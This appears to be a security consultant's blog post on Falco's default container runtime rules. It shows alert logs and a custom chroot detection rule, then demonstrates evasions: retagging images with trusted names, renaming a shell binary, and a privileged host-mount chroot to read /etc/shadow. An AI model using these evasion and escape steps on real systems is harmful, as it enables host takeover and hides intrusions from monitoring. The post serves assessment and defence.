antiTree | posts and projects
posted on Sep 15, 2019

Sometimes during a container or Kubernetes assessment, we get requested to review whether a runtime security tool that a client uses is sufficient for their threat model. This often means reviewing a custom seccomp-bpf profile, AppArmor config, or third party tool that tries to enforce the isolation between a container and the host. There’s two approaches we usually take during these gigs:

  1. Audit the profile and identify any flaws or bypasses that could exist
  2. Analyze the container at runtime to validate the policy actually enforces the expected ruleset.

Basics of Container Hardening

There are ways to harden your runtime like dropping capabilities when a container starts but when you have a goal of re-enforcing the isolation between the container and the host towards using a container more like a sandbox, the main option you have is syscall filtering/monitoring. That’s monitoring and blocking which syscalls are allowed to go from the container to the host.

If you look at some of the takes on container runtimes like Nabla, they’re taking a different approach to hardening but effectively doing the same thing – blocking syscalls from a container that could affect the host.

Falco Enters The Ring

Falco recently became an open source project and is now officially supported by the CNCF which is great. I’ve tried not to gush too hard over Sysdig in the past but I’ve liked their tools.

Falco is a runtime security tool designed to leverage Sysdig’s events monitoring library to add a layer of security on top of your containers and your host/Nodes. It uses a combination of syscall and network filtering that matches against a rule list that you can define. Compared to seccomp-bpf or AppArmour, this can let you create a more expressive policy about what you want to allow or block in your container environment.

Falco Examples

Here are some examples of the command the log generated:

/ # sudo cat /etc/shadow

Warning Sensitive file opened for reading by non-trusted program (user=root program=cat 
  command=cat /etc/shadow file=/etc/shadow parent=sudo gparent=zsh ggparent=<NA> 
  gggparent=<NA> container_id=host image=<NA>)

Start a privileged container, mount the host volume, and attach to it

/ # docker run -it --privileged -v /:/host busybox:latest

Notice A shell was spawned in a container with an attached terminal 
  (user=root incomplete (id=b08eb99c4c6b) shell=sh parent=<NA> cmdline=sh 
  terminal=34816 container_id=b08eb99c4c6b image=incomplete)
Notice Privileged container started (user=<NA> command=container:b08eb99c4c6b 
  eager_ride (id=b08eb99c4c6b) image=busybox:latest)
docker run -it --privileged -v /:/host busybox:latest
Notice Container with sensitive mount started (user=root command=container:ea83b093eb14
nifty_darwin (id=ea83b093eb14) image=busybox:latest mounts=/:/host::true:rslave)

Side Note About Filtering Containers

The last command above is fun because you’re mounting the host volume inside the container and it’s privileged so there’s not much separation from the container to the host. Once you have a shell, running the following will effectively let you take over the host:

/ # chroot /host

# cat /etc/shadow

I use this as an example because Falco’s default rules do not alert on you using chroot and it might be worth thinking about why. It’s already alerted you that a priv’d container is started, and that there’s a sensitive host mount, so why keep bugging the user every time. If you compare this writing a seccomp-bpf profile for Docker with the same effect, it would be a pretty complex policy that detects a container running as privileged, determines that it’s a sensitive volume mount, and decides how to handle it.

In fact, the seccomp-bpf version of preventing this attack boils down to something like this:

    "names": [
        "chroot"
    ],
    "action": "SCMP_ACT_KILL",
    "args": [],
    "comment": "",

And the default Docker seccomp profile does this (in a slightly different way than my example) so why doesn’t Falco?

The short answer I think is is, “Go for it”. Falco needs to be customized for your environment no matter what so go ahead and start dropping syscalls with a rule like:

- rule: drop_chroot_attempts
  desc: Custom rule to prevent the chroot syscall from being used
  condition: syscall.type = chroot and not proc.name in (docker, sysdig, dragent)
  output: "Yo, somebody's been chrooting. (user=%user.name command=%proc.cmdline container=%container.i
d)"
  priority: WARNING

Now if we run the same commands as before, we can now get more context

/ # docker run -it --privileged -v /:/host busybox:latest

Notice A shell was spawned in a container with an attached terminal (user=root incomplete
  (id=b08eb99c4c6b) shell=sh parent=<NA> cmdline=sh terminal=34816 container_id=b08eb99c4c6b
   image=incomplete)
Notice Privileged container started (user=<NA> command=container:b08eb99c4c6b eager_ride 
  (id=b08eb99c4c6b) image=busybox:latest)

/ # docker run -it --privileged -v /:/host busybox:latest
Notice Container with sensitive mount started (user=root command=container:ea83b093eb14 
  nifty_darwin (id=ea83b093eb14) image=busybox:latest mounts=/:/host::true:rslave)

// # chroot /host
Warning Yo, somebody's been chrooting. (user=root command=chroot /host container=1003f9513b76)
Warning Yo, somebody's been chrooting. (user=root command=chroot /host container=1003f9513b76)

(someone else can explain to me why there are 2 separate syscalls but that’s besides the point)

Using Falco As Intended

My point isn’t that the default policy not blocking the chroot syscall is a security flaw, it’s that Falco right now has a different use case than other runtime security products or tools. Falco is a runtime security product AND a monitoring tool. If you filter on a syscall in Falco, you’re prone to get a lot more alerts with very little context. Compare it to seccomp – for seccomp-bpf, you’re blocking syscalls and maybe trying to stop container runtime 0-days. For Falco, you’re watching for common activities and reacting to them.

One of the challenges that you get when you’re writing rules at a higher level than just blocking syscalls, is there’s going to be more bypasses and edge cases you have to be concerned about. When coming up with a mitigation for an attack like wanting to prevent a chroot from compromising the host, the question becomes “Should I block the chroot syscall or should I block the scenario where a chroot could cause damage?" I think for Falco, the expected practice is block the attributes of the activity (privileged mode, host mounts, TTY started) and not just the syscalls so that your team can make more educated decisions about the context of the issue.

I’ll go through a few examples that that can bypass Falco’s default rules:

Bypass Privileged Restrictions

Falco can detect when a privileged container is started as one might expect. It does this with a rule. You can see below for detecting priv’d containers it’s first a condition that references a macro which references a list. This could be interpreted as “If something starts a privileged container that’s no one of the ones from my list of approved images, alert.”

- list: falco_privileged_images
  items: [
    docker.io/sysdig/agent, docker.io/sysdig/falco, docker.io/sysdig/sysdig,
    gcr.io/google_containers/kube-proxy, docker.io/calico/node,
    docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/mesosphere/mesos-slave,
    docker.io/docker/ucp-agent, sematext_images, k8s.gcr.io/kube-proxy
    ]

- macro: falco_privileged_containers
  condition: (openshift_image or
              user_trusted_containers or
              container.image.repository in (trusted_images) or
              container.image.repository in (falco_privileged_images) or
              container.image.repository startswith istio/proxy_ or
              container.image.repository startswith quay.io/sysdig)

- rule: Launch Privileged Container
  desc: Detect the initial process started in a privileged container. Exceptions are made for known trusted images.
  condition: >
    container_started and container
    and container.privileged=true
    and not falco_privileged_containers
    and not user_privileged_containers    
  output: Privileged container started (user=%user.name command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag)
  priority: INFO
  tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]

Since we can’t run our busybox image as privileged anymore (or without someone finding us), lets figure out a way around it by tagging it to match the “falco_privileged_containers” macro which allows the string “k8s.gcr.io/kube-proxy” as an image name.

Demo

Tag busybox as “k8s.gcr.io/kube-proxy”

docker tag busybox:latest k8s.gcr.io/kube-proxy

Start the container again

docker run -it --privileged -v /:/host k8s.gcr.io/kube-proxy 

Success! This will not produce any alerts about you running a privileged container.

It will however create an alert that says

Notice Container with sensitive mount started (user=root command=container:ea83b093eb14 nifty_darwin (id=ea83b093eb14) image=busybox:latest mounts=/:/host::true:rslave)

Bypass Sensitive Volume Mount Alert

Lets see if we can’t bypass the sensitive mounts alert then. Here’s the rules:

- list: falco_sensitive_mount_images
  items: [
    docker.io/sysdig/agent, docker.io/sysdig/falco, docker.io/sysdig/sysdig,
    gcr.io/google_containers/hyperkube,
    gcr.io/google_containers/kube-proxy, docker.io/calico/node,
    docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/consul,
    docker.io/datadog/docker-dd-agent, docker.io/datadog/agent, docker.io/docker/ucp-agent, docker.io/gliderlabs/logspout,
    docker.io/netdata/netdata, docker.io/google/cadvisor, docker.io/prom/node-exporter
    ]

- macro: falco_sensitive_mount_containers
  condition: (user_trusted_containers or
              container.image.repository in (trusted_images) or
              container.image.repository in (falco_sensitive_mount_images) or
              container.image.repository startswith quay.io/sysdig)

Demo

Tag busybox as “quay.io/sysdig”

docker tag busybox:latest quay.io/sysdig

Start the container again

docker run -it --privileged -v /:/host quay.io/sysdig

Success! With the bonus that the string “quay.io/sysdig” allows us to run as both privileged and with a sensitive volume.

Bypass Terminal

Now we’re getting into it.

- list: shell_binaries
  items: [ash, bash, csh, ksh, sh, tcsh, zsh, dash]

- macro: shell_procs
  condition: proc.name in (shell_binaries)

- rule: Terminal shell in container
  desc: A shell was used as the entrypoint/exec point into a container with an attached terminal.
  condition: >
    spawned_process and container
    and shell_procs and proc.tty != 0
    and container_entrypoint    
  output: >
    A shell was spawned in a container with an attached terminal (user=%user.name %container.info
    shell=%proc.name parent=%proc.pname cmdline=%proc.cmdline terminal=%proc.tty container_id=%container.id image=%container.image.repository)    
  priority: NOTICE
  tags: [container, shell, mitre_execution]

If you walk up from the bottom you see that it’s basically saying “If it’s a spawned process in a container, and it’s one of the shells from my list, and it creates a TTY and it’s coming from runc/docker-runc then alert.”

Can we just rename our shell to from “bash” to “antish” and bypass it?

Demo

FROM ubuntu
RUN cp /bin/bash /bin/antish

Build your Dockerfile and name stomp it again

docker build -t quay.io/sysdig .

Start the container again

docker run -it --privileged -v /:/host quay.io/sysdig

Yes! We’ve now bypassed the terminal alert, the sensitive volume alert, and the privileged container alert. If these rules were changed from just warning the user about the activity to actually blocking them, it’d be more interesting but I think the point is made.

Conclusions

To be clear, I’m NOT finding flaws or beating up on Falco. I’m demonstrating how Falco works, some of its intended uses, and to my pentesting friends, what normally goes into an assessment in an environment where Falco is enabled. In the real world, the environments are much more complex and so are the bypasses. We would normally assess these rules the same way if it was an Aqua, Twistlock, or Neuvector product – what do the rules do, and how can we evade them.

Some of these methods are going into a talk I’m hoping to get accepted that shares examples and testing methodology for NCC Group’s container practice.